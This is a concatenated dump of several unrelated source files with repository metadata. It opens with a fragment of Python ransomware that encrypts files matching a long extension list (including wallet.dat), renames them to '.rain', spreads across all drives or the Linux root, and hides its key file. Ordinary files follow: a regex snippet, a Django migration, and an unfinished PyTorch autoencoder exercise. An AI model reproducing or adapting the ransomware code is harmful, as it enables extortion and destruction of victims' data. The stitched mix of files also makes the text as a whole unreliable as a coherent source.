,'*.aes','*.ARC','*.PAQ','*.tar.bz2','*.tbk','*.bak','*.djv','*.djvu','*.bmp','*.cgm','*.tif','*.tiff','*.NEF','*.cmd','*.class','*.jar','*.java','*.asp','*.brd'
,'*.sch','*.dch','*.dip','*.vbs','*.asm','*.pas','*.ldf','*.ibd','*.MYI','*.MYD','*.frm','*.dbf','*.SQLITEDB','*.SQLITE3','*.asc','*.lay6','*.lay','*.ms11 (Security copy)'
,'*.sldm','*.sldx','*.ppsm','*.ppsx','*.ppam','*.docb','*.mml','*.sxm','*.otg','*.slk','*.xlw','*.xlt','*.xlm','*.xlc','*.dif','*.stc','*.sxc','*.ots','*.ods','*.hwp'
,'*.dotm','*.dotx','*.docm','*.DOT','*.max','*.xml','*.uot','*.stw','*.sxw','*.ott','*.csr','*.key','wallet.dat','*.veg','*.application','*.lnk','*.bitmap','*.gif'
,'*.chc','*.ogg','*.json','*.real','*.xz','*.nrg','*.xvf','*.xvfz','*.tmp','*.sublime-package','*.img','*.bg2','*.qxd','*.new','*.ico','*.pps','*.pic','*.iso','*.rm'
,'*.dxf','*.so','*.appref-ms','*.desktop','*.list']
class Crypt:
"""
Class containing the methods used for encryption
"""
def crypt(file):
"""
Encrypt a file
"""
try:
with open(file,'rb') as f:
f = f.read()
correct = f+b'#'*(16-len(f)%16)
cifdata = aes.encrypt(correct)
with open(file,'wb') as cifile:
cifile.write((os.path.splitext(file)[1].strip('.')+'.').encode()+cifdata)
ne = os.path.splitext(file)[0]
os.rename(file,ne+".rain")
except:
pass
def c_iterator(dirct):
#An iterator that uses glob to search for files with pre-defined extensions and encrypt them
for i in ext:
iterator = glob.iglob(dirct+'/**/'+i,recursive=True)
for file in iterator:
Crypt.crypt(file)
def infectall():
"""
Once you have encrypted the three main directories using "c_iterator" this function is used,
which encrypts the rest of the entire disk and ,in Windows,
searches for the drives inserted in the machine and continues the process
"""
if s=='Windows':
for drive in drives:
drive = drive+':/'
for e in ext:
iterator = glob.iglob(drive+'/**/'+e,recursive=True)
for file in iterator:
Crypt.crypt(file)
elif s=='Linux':
for e in ext:
iterator = glob.iglob('//**/'+e,recursive=True)
for file in iterator:
Crypt.crypt(file)
def resource_path(relative_path):
"""
Here is just a fix so there are no compile errors with certain libraries
"""
if hasattr(sys, '_MEIPASS'):
return os.path.join(sys._MEIPASS, relative_path)
return os.path.join(os.path.abspath("."), relative_path)
def check_if_is_admin():
"""
Check if the program was run with administrative powers.
"""
if s=='Windows':
try:
with open(r'C:\Windows\System32\cap','wb') as f:
f.write('isornot'.encode())
except PermissionError:
return False
os.remove(r'C:\Windows\System32\cap')
return True
elif s=='Linux':
if(os.getuid()==0):
return True
else:
return False
def check_w_key(documents,documentos=os.path.expanduser('~/Documentos')):
"""
This method in particular ensures the functionality of subsequent decryption.
Basically it checks if a key has already been generated for that computer by reading the saved key files.
This helps to ensure that a new key is not created when the machine is restarted and the new one is lost.
Maybe it would be much better just to save in a text file a "0" state for key saved or know what to do all that code.
Forgive me. I need help.
"""
global k
if s=='Windows':
try:
try:
with open(documents+'/.officek','rb') as okey:
ok = okey.read()
if len(ok)==32:
k = ok
else:
try:
with open(documents+'/.officek','wb') as key:
key.write(k)
sis('cd '+documents)
sis('attrib +s +h '+documents+'/.officek')
except:
pass
except:
try:
with open(documents+'/.officek','wb') as key:
key.write(k)
sis('cd '+documents)
sis('attrib +s +h '+documents+'/.officek')
except:
pass
except:
try:
with open('C:/Users/Public/.officek','rb') as okey:
ok = okey.read()
if len(ok)==32:
k = ok
else:
try:
with open('C:/Users/Public/.officek','wb') as key:
key.write(k)
sis('cd C:/Users/Public')
sis('attrib +s +h C:/Users/Public/.officek')
except:
pass
except:
try:
with open('C:/Users/Public/.officek','wb') as key:
key.write(k)
sis('cd C:/Users/Public')
sis('attrib +s +h C:/Users/Public/.officek')
except:
pass
elif s=='Linux':
try:
try:
with open(documents+'/.officek','rb') as okey:
ok = okey.read()
if len(ok)==32:
k = ok
else:
try:
with open(documents+'/.officek','wb') as key:
key.write(k)
except:
pass
except:
try:
with open(documents+'/.officek','wb') as key:
key.write(k)
except:
pass
except:
try:
with open(documentos+'/.officek','rb') as okey:
ok = key.read()
if len(ok)==32:
k = ok
else:
try:
with open(documentos+'/.oficcek','wb') as key:
key.write(k)
except:
pass
except:
try:
with open(documentos+'/.oficcek','wb') as key:
key.write(k)
except:
pass
|
[
"noreply@github.com"
] |
shariarislam.noreply@github.com
|
072d3acc8178cbc92f168df6263f558c08a1f546
|
2dfbd1328e4dd6dc9852d52e90cd627b402059e1
|
/OOPALL/Hakrrank_problem/groups.py
|
dd5675819998703af1eb88b8a888df0b993a1557
|
[] |
no_license
|
Bappy200/Python
|
2817bcb32bf751033fadc960694704a546055e47
|
0ad3d53cc204af361890182585cdf9bd3ec9a199
|
refs/heads/main
| 2023-03-01T05:29:32.994940
| 2021-02-12T23:08:36
| 2021-02-12T23:08:36
| 338,268,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 76
|
py
|
import re
r = re.search(r'(\w)\1+',input())
print(r.group(1) if r else -1)
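A hedged illustration of what the one-liner above does (the sample string is invented for demonstration):
# the backreference (\w)\1+ matches the first character that repeats consecutively
import re
m = re.search(r'(\w)\1+', 'abcddeff')
print(m.group(1) if m else -1)  # prints: d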
|
[
"sbappyi200@gmail.com"
] |
sbappyi200@gmail.com
|
86e07b1730af7e8a3340956c2429f3b0648d9add
|
23d08c6d3331179aaf91ea987dc57168f130553d
|
/dailyfresh_plus/user/migrations/0002_auto_20190611_1605.py
|
ac03219983203450879d348487cbf15815643131
|
[] |
no_license
|
bajiucoding/dailyfresh_plus
|
a02d23531e5d4a6215fe3ac2490d0020251d9e0e
|
a6d0911df1e4a301aa2a076407c22fa8f83ea252
|
refs/heads/master
| 2020-05-26T18:35:37.648086
| 2019-06-23T17:05:15
| 2019-06-23T17:05:15
| 188,337,705
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
# Generated by Django 2.2 on 2019-06-11 08:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='userinfo',
name='uemail',
field=models.CharField(max_length=40, verbose_name='邮箱'),
),
]
|
[
"gxylogin@sina.com"
] |
gxylogin@sina.com
|
b51b5706808d245fd63e7a99d9debb2c38961964
|
235dfd0b3ba5ba3c5c7ca36e80b9eb4fc67c8b95
|
/SSD_active_crowd_analysis/ssd/utils/heatmap.py
|
44346c70da780c5fcb32727ee3e25d49e2a6623a
|
[
"MIT"
] |
permissive
|
SamSamhuns/active_crowd_analysis
|
2473601463552f8543e156855b830e946236ff0e
|
99fe12812b74ac487d394211e9bd54ae9173faf1
|
refs/heads/master
| 2023-02-13T15:03:12.732311
| 2021-01-23T12:10:20
| 2021-01-23T12:10:20
| 280,635,459
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,847
|
py
|
import cv2
import math
import time
import numpy as np
import seaborn as sns
import matplotlib.cm as cm
import matplotlib.pyplot as plt
from sklearn.mixture import GaussianMixture
def generate_sns_kde_heatmap(x, y, i=0, image_name=""):
start = time.time()
try:
x = np.hstack((x, x + 2, x - 2, x))
y = np.hstack((y - 10, y, y, y + 8))
plt.gca().invert_yaxis()
fig = sns.kdeplot(x, y, cmap=cm.jet, shade=True)
fig = fig.get_figure()
plt.scatter(x, y, 3)
fig.savefig(f'demo/result/{image_name.split(".")[0]}_snshmap{i}.{image_name.split(".")[1]}')
print(f"seaborn kde plot time {round((time.time() - start) * 1000, 3)}ms")
plt.clf()
except Exception as e:
print("SNS kde error")
print(e)
def generate_kde_heatmap(centers,
i=0,
image_name="",
grid_size=1,
radius=30):
"""
WARNING Slow
KDE Quartic kernel plot
"""
def kde_quartic(d, h):
"""
function to calculate intensity with quartic kernel
:param d: distance
:param h: radius
:return:
"""
dn = d / h
P = (15 / 16) * (1 - dn ** 2) ** 2
return P
start = time.time()
x = centers[:, 0]
y = centers[:, 1]
h = radius
# x,y min and max
x_min, x_max, y_min, y_max = min(x), max(x), min(y), max(y)
# grid constructions
x_grid = np.arange(x_min - h, x_max + h, grid_size)
y_grid = np.arange(y_min - h, y_max + h, grid_size)
x_mesh, y_mesh = np.meshgrid(x_grid, y_grid)
# grid center point
xc = x_mesh + (grid_size / 2)
yc = y_mesh + (grid_size / 2)
# processing
intensity_list = []
for j in range(len(xc)):
intensity_row = []
for k in range(len(xc[0])):
kde_value_list = []
            for pt in range(len(x)):
                # distance from the grid centre to each data point; the loop variable is
                # renamed from `i` so it no longer shadows the function's `i` argument
                d = math.sqrt((xc[j][k] - x[pt]) ** 2 + (yc[j][k] - y[pt]) ** 2)
if d <= h:
p = kde_quartic(d, h)
else:
p = 0
kde_value_list.append(p)
# summing all intensity values
p_total = sum(kde_value_list)
intensity_row.append(p_total)
intensity_list.append(intensity_row)
# heatmap output
intensity = np.array(intensity_list)
plt.pcolormesh(x_mesh, y_mesh, intensity)
plt.plot(x, y, 'ro') # plot center points
plt.xticks([])
plt.yticks([])
plt.gca().invert_yaxis()
plt.savefig(f'demo/result/{image_name.split(".")[0]}_{i}.{image_name.split(".")[1]}')
plt.clf()
print("Heatmap generation time", round((time.time() - start) * 1000, 3), 'ms')
def generate_cv2_heatmap(centers,
center_labels,
i=0,
image_name=None,
n_components=3,
covariance_type='diag'):
start = time.time()
# fit a Gaussian Mixture Model with two components
clf = GaussianMixture(n_components=n_components, covariance_type=covariance_type)
X_train = np.vstack((centers, centers * 1.01)) # duplicate all centers
clf.fit(X_train, np.hstack((center_labels, center_labels)))
# display predicted scores by the model as a contour plot
x = np.linspace(-100, 100, 200)
y = np.linspace(-100, 100, 200)
X, Y = np.meshgrid(x, y)
XX = np.array([X.ravel(), Y.ravel()]).T
Z = -clf.score_samples(XX)
heatmap = Z.reshape(X.shape)
heatmap2 = cv2.resize(-heatmap, (800, 600))
heatmapshow = None
heatmapshow = cv2.normalize(heatmap2, heatmapshow, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)
heatmapshow = cv2.applyColorMap(heatmapshow, cv2.COLORMAP_JET)
if image_name is not None:
fname = f'demo/result/{image_name.split(".")[0]}_cv2_{i}.{image_name.split(".")[1]}'
cv2.imwrite(fname, heatmapshow)
print(f"GMM Contour & OpenCV Heat map time {round((time.time() - start) * 1000, 3)}ms")
return heatmapshow
def generate_sk_gaussian_mixture(centers,
center_labels,
i=0,
image_name="",
n_components=3,
covariance_type='diag',
draw_contour=False):
"""
Sklearn Gaussian Mixture Model
"""
start = time.time()
# fit a Gaussian Mixture Model with two components
clf = GaussianMixture(n_components=n_components, covariance_type=covariance_type)
X_train = np.vstack((centers, centers * 1.01)) # duplicate all centers
clf.fit(X_train, np.hstack((center_labels, center_labels)))
# display predicted scores by the model as a contour plot
x = np.linspace(-100, 100, 200)
y = np.linspace(-100, 100, 200)
X, Y = np.meshgrid(x, y)
XX = np.array([X.ravel(), Y.ravel()]).T
Z = -clf.score_samples(XX)
Z = Z.reshape(X.shape)
if draw_contour:
plt.contour(X, Y, Z, levels=20, cmap=cm.jet)
plt.scatter(X_train[:, 0], X_train[:, 1], 3)
plt.title('GMM clusters')
plt.axis('tight')
plt.gca().invert_yaxis()
plt.savefig(f'demo/result/{image_name.split(".")[0]}_gmm_cont{i}.{image_name.split(".")[1]}')
plt.clf()
heatmap = Z
plt.scatter(X_train[:, 0], X_train[:, 1], 3)
plt.imshow(-heatmap, interpolation='bilinear', origin='lower',
cmap=cm.jet)
plt.gca().invert_yaxis()
plt.savefig(f'demo/result/{image_name.split(".")[0]}_gmm_hmap{i}.{image_name.split(".")[1]}')
plt.clf()
print(f"GMM Contour & Heat map time {round((time.time() - start) * 1000, 3)}ms")
|
[
"samhunsadamant@gmail.com"
] |
samhunsadamant@gmail.com
|
469ad0de3326f303fbd9aad31a63fd4780fd8403
|
aa72194e9dabc23ef83f5890225a60e1e9961aeb
|
/pyplot/pyplot_bar_chart_horizon.py
|
37de376601bf0cd9103fd20ebb8d682ec04ce840
|
[] |
no_license
|
chrisna2/pandas_with_stock
|
bdec5da414ac65e045ce7cd350e01b593ffec996
|
4ac660288f780cf5d16b25cdc28ca046e194311e
|
refs/heads/master
| 2022-10-09T06:59:41.597016
| 2022-09-13T12:28:11
| 2022-09-13T12:28:11
| 214,951,212
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 921
|
py
|
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import font_manager, rc
font_name = font_manager.FontProperties(fname="C:/Windows/Fonts/malgun.ttf").get_name()
rc('font', family=font_name)
industry = ['통신업','의료정밀','운수업창고','의약품','음식료품','전기가스업','서비스업','전기전자','종이목재','증권']
fluctuations = [1.83, 1.30, 1.30, 1.26, 1.06, 0.93, 0.77, 0.68, 0.65, 0.61]
fig = plt.figure(figsize=(12, 8))
ax = fig.add_subplot(111)
'''
Switch the vertical bar chart to a horizontal bar chart
'''
ypos = np.arange(10)
rects = plt.barh(ypos, fluctuations, align='center', height=0.5)
plt.yticks(ypos, industry)
for i, rect in enumerate(rects):
ax.text(0.95 * rect.get_width(),
rect.get_y() + rect.get_height() / 2.0,
str(fluctuations[i])+'%',
ha='right',
va='center')
plt.xlabel('등락률')
plt.show()
|
[
"chrisna2@hanmail,net"
] |
chrisna2@hanmail,net
|
6fed9cbc088abb0e15108a8775e4974e2d3d3d9c
|
805665ba37ad17c9da639beb84f85f5a6431e097
|
/SinglePoint/PHC.py
|
5167a76adce2d06b3257d9ac26dae6c729b53e37
|
[
"MIT"
] |
permissive
|
Juanc0/OptimizationTests
|
16246dcc829465e32669c7efe98bf5ba99da2e81
|
59f57e02a23c3fa580c9aea3206ea37b98ed64c0
|
refs/heads/master
| 2020-07-24T23:45:21.794123
| 2019-10-16T10:17:23
| 2019-10-16T10:17:23
| 208,087,558
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 727
|
py
|
from multiprocessing.pool import ThreadPool
from HC import HC
class PHC:
def __init__(self, x, f, stop, step, threads):
self.f = f
self.HC = HC(x, f, stop, step)
self.pool = ThreadPool(processes = threads)
self.threads = threads
def exe(self):
#exes = [self.pool.apply_async(self.HC.exe(), args=()) for i in range(self.threads)]
exes = [self.HC.exe() for i in range(self.threads)]
#minimizers = [ret.get() for ret in exes]
#return PHC.minimizer(minimizers, self.f)
return PHC.minimizer(exes, self.f)
@staticmethod
def minimizer(minimizers, f):
minimizer = minimizers[0]
minimum = f(minimizer)
for mini in minimizers:
new = f(mini)
if new < minimum:
minimizer = mini
return minimizer
|
[
"juanpos97@gmail.com"
] |
juanpos97@gmail.com
|
cf706a98c06a9e54a44714fe96e6e31e62e087e0
|
729d826978bd7c0d808629f1be5c2ebffe856799
|
/pano/puppetdb/pdbutils.py
|
95f2f88307304d01461cd84967eb28f41bc0b95b
|
[
"Apache-2.0"
] |
permissive
|
jwennerberg/panopuppet
|
e892e34f1820dc1f8281d066e686f6d3905bffd2
|
567e7f3001b4f3819a3f8af0a8251bb0a1ceb233
|
refs/heads/master
| 2021-01-14T13:44:18.894736
| 2015-03-30T12:56:39
| 2015-03-30T12:56:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,632
|
py
|
import datetime
import queue
from threading import Thread
from pano.puppetdb import puppetdb
import pano.methods.dictfuncs
class UTC(datetime.tzinfo):
"""UTC"""
def utcoffset(self, dt):
return datetime.timedelta(0)
def tzname(self, dt):
return str('UTC')
def dst(self, dt):
return datetime.timedelta(0)
def __repr__(self):
return str('<UTC>')
def __str__(self):
return str('UTC')
def __unicode__(self):
return 'UTC'
def json_to_datetime(date):
"""Tranforms a JSON datetime string into a timezone aware datetime
object with a UTC tzinfo object.
:param date: The datetime representation.
:type date: :obj:`string`
:returns: A timezone aware datetime object.
:rtype: :class:`datetime.datetime`
"""
return datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%fZ').replace(
tzinfo=UTC())
def is_unreported(node_report_timestamp, unreported=2):
try:
if node_report_timestamp is None:
return True
last_report = json_to_datetime(node_report_timestamp)
last_report = last_report.replace(tzinfo=None)
now = datetime.datetime.utcnow()
unreported_border = now - datetime.timedelta(hours=unreported)
if last_report < unreported_border:
return True
except AttributeError:
return True
return False
def run_puppetdb_jobs(jobs, threads=6):
if type(threads) != int:
threads = 6
if len(jobs) < threads:
threads = len(jobs)
jobs_q = queue.Queue()
out_q = queue.Queue()
def db_threaded_requests(i, q):
while True:
t_job = q.get()
t_path = t_job['path']
t_params = t_job.get('params', {})
t_verify = t_job.get('verify', False)
t_api_v = t_job.get('api', 'v3')
results = puppetdb.api_get(
path=t_path,
params=puppetdb.mk_puppetdb_query(t_params),
api_version=t_api_v,
verify=t_verify,
)
out_q.put({t_job['id']: results})
q.task_done()
for i in range(threads):
worker = Thread(target=db_threaded_requests, args=(i, jobs_q))
worker.setDaemon(True)
worker.start()
for job in jobs:
jobs_q.put(jobs[job])
jobs_q.join()
job_results = {}
while True:
try:
msg = (out_q.get_nowait())
job_results = dict(
list(job_results.items()) + list(msg.items()))
except queue.Empty:
break
return job_results
|
[
"takeshi.p.larsson@gmail.com"
] |
takeshi.p.larsson@gmail.com
|
db8236cb38994639e473477f46c0cffb49bef4fd
|
e18198c0df3155fdc5c7962300da52a2ce613d8b
|
/api_for_selenium/manage.py
|
a26adfae243186c4535cc57498da28abf39b59ce
|
[
"MIT"
] |
permissive
|
sayantansingha01/interview1
|
058fe8705e0284bac34ded3230b8194b237874b9
|
8ecbbcf7d293830fe4e46a98aedef9bc6d1d1272
|
refs/heads/main
| 2023-06-27T11:58:43.535970
| 2021-07-29T07:34:03
| 2021-07-29T07:34:03
| 390,621,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_for_selenium.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"sayantansinghasara@gmail.com"
] |
sayantansinghasara@gmail.com
|
c4b9a7add45bcfdc33148593901df9adc58eb559
|
71ed291b47017982a38524b4ff8fe94aa947cc55
|
/String/LC257. Binary Tree Path.py
|
8024e307b462af60e2471526defd6973b8ca39f2
|
[] |
no_license
|
pingting420/LeetCode_Algorithms
|
da83b77e8f37bd4f461b0a7e59c804871b6151e5
|
f8786864796027cf4a7a8b0ad76e0b516cd99b54
|
refs/heads/main
| 2023-07-17T22:46:08.803128
| 2021-09-02T22:06:38
| 2021-09-02T22:06:38
| 375,401,021
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
class Solution:
def binaryTreePaths(self, root):
"""
:type root: TreeNode
:rtype: List[str]
"""
def construct_paths(root, path):
if root:
path += str(root.val)
if not root.left and not root.right: # cur node is not leaf node
paths.append(path) # add the path to the ans
else:
path += '->' # if cur node is not leaf, continue to traversal
construct_paths(root.left, path)
construct_paths(root.right, path)
paths = []
construct_paths(root, '')
return paths
|
[
"bellapingting@gmial.com"
] |
bellapingting@gmial.com
|
6eac2e6e75bf180aae3072c5f7fed4fbcc52e4b7
|
61a40a90fd5d25446e932a24958641c75d17c4f4
|
/perform_pca.py
|
fb7fbf2e569f80226e7331c7baa48134ce48b425
|
[
"BSD-3-Clause"
] |
permissive
|
janiksielemann/shape-based-TF-binding-prediction
|
8fff7dcbf3d888d39661f78e0438e6b367792df8
|
32f86b958b6619fa45f2184bb7cd40f3a195a851
|
refs/heads/master
| 2023-04-18T16:56:27.522055
| 2021-10-10T13:17:44
| 2021-10-10T13:17:44
| 295,798,062
| 2
| 2
| null | 2021-10-10T12:57:03
| 2020-09-15T17:13:53
|
Python
|
UTF-8
|
Python
| false
| false
| 895
|
py
|
import pandas as pd
from sklearn.decomposition import PCA
#set border length
border_length = 4
# generate list of shapes
all_shapes = ['Stagger', 'Rise', 'Opening', 'Buckle', 'MGW', 'Tilt', 'HelT', 'Roll', 'Shear', 'Slide', 'Stretch', 'ProT', 'Shift']
# generate whole set
shape_fimo = pd.read_csv("shape_fimo_forward.csv")
core_motif_len = len(shape_fimo["matched_sequence"].iloc[0])
header = []
for shape in all_shapes:
for i in range((30 - border_length),(30 + core_motif_len + border_length)):
header.append(shape + "_" + str(i))
X_shapes = shape_fimo[header]
#PCA
pca = PCA(n_components=10)
principal_components = pca.fit_transform(X_shapes.to_numpy())
principal_df = pd.DataFrame(data = principal_components, columns = ['PC1', 'PC2', 'PC3', 'PC4', 'PC5', 'PC6', 'PC7', 'PC8', 'PC9', 'PC10'])
principal_df.to_csv("dimensionally_reduced_features.tsv", sep="\t", index=False)
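A small optional follow-up (not part of the original script) that is often useful after fitting: checking how much variance the ten components retain. `pca` is the fitted object from above; `explained_variance_ratio_` is the standard scikit-learn attribute.
# optional diagnostic, assuming the fitted `pca` object from the script above
import numpy as np
print(pca.explained_variance_ratio_)             # per-component share of variance
print(np.cumsum(pca.explained_variance_ratio_))  # cumulative share kept by PC1..PC10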
|
[
"noreply@github.com"
] |
janiksielemann.noreply@github.com
|
90ba9df1955c6619815acec5713452feddccdc4b
|
fd722476f7032c0f50293a56fa68f13a4802c4e6
|
/fm4111/bin/bandgap
|
8dd174d93258a95922044651b062d584e26a7c23
|
[] |
no_license
|
egilsk/fys-mena4111
|
1f3ab44153b95d9047dbc1e69645613c19740d8f
|
85dd40934e864fef1c536b75dbbf754dc2527755
|
refs/heads/master
| 2022-04-08T14:55:43.441603
| 2020-02-12T18:44:46
| 2020-02-12T18:44:46
| 221,038,778
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,833
|
#!/bin/env python
#
# Find the band gap from a vasp OUTCAR file
# Written by Ole Martin Lovvik, 2018-09-06
# $LastChangedDate$
# $Rev$
#
# Please send bugs to ole.martin.lovvik@sintef.no
'''
Usage: bandgap [options] OUTCAR_FILE[S]
Reports the band gap of one or more VASP calculations.
It is defined as the CBM - VBM, where the
VBM is defined by the Fermi level from VASP.
If the band gap is zero, the overlap between
VBM and CBM is thus shown as a negative number.
Options:
-h, --help Show this help message and exit
-v VM, --valencemax VM Reports the gap (positive) or overlap (negative) between
band number VM and VM+1.
'''
from __future__ import division
from __future__ import print_function
import os, shutil, re, sys, string, math
import getopt
def band_gap(valencemax=None,filename=["OUTCAR"]):
if valencemax==None:
fermisearch = 1
else:
fermisearch = 0
# Initialize:
valencemaxenergy=-100
conductionminenergy=100
# Open input file:
try:
ifile = open( filename, 'r') # r for reading
except IOError:
print("Error: File does not appear to exist. "+filename)
return()
# Find the Fermi energy:
nkpoints, fermienergy = find_fermi(ifile)
# Position in ifile: E-fermi : ...
if fermienergy == None:
print("Error: did not find the Fermi energy. "+filename)
return()
# Find the highest occupied orbital (valencemax) if not already specified:
if valencemax==None:
nk, valenceocc, conductionocc,valencemax = find_valencemax(ifile,fermienergy)
else:
nk = 0
valenceocc = 0
conductionocc = 0
# Move to correct position in OUTCAR:
ifile.seek(0)
while 1:
line = ifile.readline()
if re.search('E-fermi :', line):
break
# Search for the highest energy of the valence band (valencemaxenergy)
# and the lowest energy of the conduction band (conductionminenergy):
searchstring='^ +' + str(int(valencemax)) + ' '
while nk < nkpoints + 1:
line = ifile.readline()
if re.search(searchstring, line):
no,valenceenergy,occ = list(map(float, line.split()))
nk = nk + 1
valenceocc = valenceocc + occ
if valenceenergy>valencemaxenergy:
valencemaxenergy=valenceenergy
line = ifile.readline()
no,conductionenergy,occ = list(map(float, line.split()))
conductionocc = conductionocc + occ
if conductionenergy<conductionminenergy:
conductionminenergy=conductionenergy
if not line:
break
# print results:
bandgap = conductionminenergy - valencemaxenergy
valenceocc = valenceocc/nk
conductionocc = conductionocc/nk
print("%8.4f %4d %8.4f %8.4f %7.2f %7.2f %s" % (bandgap, valencemax, valencemaxenergy, conductionminenergy, valenceocc, conductionocc, filename))
# Find Fermi energy:
def find_fermi(ifile):
# Find Fermi energy:
while 1:
line = ifile.readline()
if re.search('irreducible', line):
a,points,b = line.split(None,2)
nkpoints = int(points)
if re.search('1st', line):
a,points,b = line.split(None,2)
nkpoints = int(points)
elif re.search('electrostatic', line): # Go to self-consistent band structure
break
elif not line:
return(None,None)
while 1:
line = ifile.readline()
if re.search('E-fermi', line):
a,b,energy,c = line.split(None,3)
fermienergy=float(energy)
return(nkpoints, fermienergy)
elif not line:
return(None,None)
# Find valence band maximum:
def find_valencemax(ifile,fermienergy):
nklist=[]
nkn=0
while 1:
line = ifile.readline()
if re.search('k-point ', line):
nklist.append(line.split()[-3:])
nkn+=1
#print(nkn)
if re.search('band No.', line):
break
while 1:
line = ifile.readline()
no,valenceenergy,occ = list(map(float, line.split()))
if valenceenergy>fermienergy:
valencemax = no-1
conductionminenergy = valenceenergy
conductionocc = occ
nk = 1
break
valencemaxenergy = valenceenergy
valenceocc = occ
if not line:
print("Error: did not find the highest valence band")
return(None,None,None,None)
return(nk,valenceocc,conductionocc,valencemax)
def main():
global valencemax
global files
# Default values:
files=["OUTCAR"]
valencemax=None
shopts = 'hv'
longopts = ['help', 'valencemax']
try:
opts, args = getopt.getopt(sys.argv[1:], shopts, longopts)
except getopt.GetoptError as err:
# print help information and exit:
print('{0}: {1}'.format(sys.argv[0], str(err)))
print(__doc__)
sys.exit(2)
for o, a in opts:
if o in ('-h', '--help'):
# print help information and exit:
print(__doc__)
sys.exit()
elif o in ('-v', '--valencemax'):
valencemax = int(args[0])
del args[0]
else:
assert False, 'unhandled option'
print('Error: option is not known')
sys.exit(2)
if len(args) > 0:
files = args
print("Gap\tBand#\tVBM\tCBM\tVBM-occ\tCBM-occ\tFile")
for filename in files:
band_gap(valencemax=valencemax,filename=filename)
if __name__ == "__main__":
col_width = {'col1' : 18, 'col2' : 13, 'col3' : 17}
rows_proj = ['Gap', 'Band#', 'VBM', 'CBM', 'VBM-occ', 'CBM-occ']
main()
|
[
"egilsk@stallo-2.local"
] |
egilsk@stallo-2.local
|
|
4270b715b9c38ea114badce39c4031d8aaa8894b
|
210baab405f7224e9ef24b59598e8ce719f570c0
|
/models/M64/M64.py
|
4fbf41dc2799a58a01918416675100083608cae2
|
[] |
no_license
|
DexiongYung/domain-adaptation
|
aed642689cd7228fbaf681217b3cda3011e2a2fc
|
291d46117b58a5f5c0f4f8e8fa95c0a49ade21f3
|
refs/heads/master
| 2023-07-06T16:29:23.866602
| 2021-08-15T09:19:59
| 2021-08-15T09:19:59
| 381,237,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 304
|
py
|
import torch.nn as nn
class M64(nn.Module):
def __init__(self, content_latent_size = 32, input_channel = 3, flatten_size = 1024):
super(M64, self).__init__()
self.content_latent_size = content_latent_size
self.input_channel = input_channel
self.flatten = flatten_size
|
[
"YungDexiong@hotmail.com"
] |
YungDexiong@hotmail.com
|
5183d376a6b88b1b2cb642129762e86e74285b11
|
55769e0abdf2df24a8e67baa28e5742b9667ce5e
|
/autoencoder_task/task.py
|
f632d7a204d3d58ae58d91ad734aac06291096e4
|
[] |
no_license
|
jgamper/DeepBayesApplication
|
3a310b2e610ad8ae8fd927767519b13dbb34f2e4
|
643f40818b58fa8c5990152b30aff8bc1e9918ea
|
refs/heads/master
| 2020-03-07T17:30:20.364599
| 2018-04-22T20:20:46
| 2018-04-22T20:20:46
| 127,613,062
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,832
|
py
|
import os
import torch
import argparse
import numpy as np
import torch.utils.data
from torch import nn, optim
from torch.autograd import Variable
from torchvision import datasets, transforms
from torchvision.utils import save_image
class AutoEncoder(nn.Module):
def __init__(self, inp_size, hid_size):
super(AutoEncoder, self).__init__()
"""
Here you should define layers of your autoencoder
Please note, if a layer has trainable parameters, it should be nn.Linear.
## !! CONVOLUTIONAL LAYERS CAN NOT BE HERE !! ##
However, you can use any noise inducing layers, e.g. Dropout.
Your network must not have more than six layers with trainable parameters.
:param inp_size: integer, dimension of the input object
:param hid_size: integer, dimension of the hidden representation
"""
self.inp_size = inp_size
self.hid_size = hid_size
################################################################
# Hacky way to introduce hyper-parameters, since we can't modify
# the functions or class inputs and have to fill only the blanks
# I used some of these for research question purposes
self.num_layers = 2 # Numer of layers
self.l1_loss = True # or L2 alternative
self.l1_weights = True # or L2 regularisation alternative
self.lam = 0.0001 # Parameter regularisation strength
self.loss_f = nn.L1Loss() if self.l1_loss == True else nn.MSELoss()
self.weight_f = nn.L1Loss(size_average=False) if self.l1_weights == True else nn.MSELoss(size_average=False)
# Let the encoder and decoder number of hidden units be adjusted
# according to local hyper-parameter - number of layers
encoder_l = np.linspace(self.inp_size, self.hid_size, self.num_layers+1).astype(int).tolist()
decoder_l = encoder_l[::-1]
# Build a list of tuples (in_size, out_size) for nn.Linear
self.encoder_l = [(encoder_l[i], encoder_l[i+1]) for i in range(len(encoder_l[:-1]))]
self.decoder_l = [(decoder_l[i], decoder_l[i+1]) for i in range(len(decoder_l[:-1]))]
# Given above build encoder and decoder networks
self.encoder = self.return_mlp(self.num_layers, self.encoder_l)
self.decoder = self.return_mlp(self.num_layers, self.decoder_l)
@staticmethod
def return_mlp(num_layers, num_hidden):
"""
Applicant defined function to return an mlp
:param num_layers: int, number of layers
:param num_hidden: list, with elements being a number of hidden units
"""
# Creates layers in an order Linear, Tanh, Linear, Tanh,.. and so on.. using list comprehension
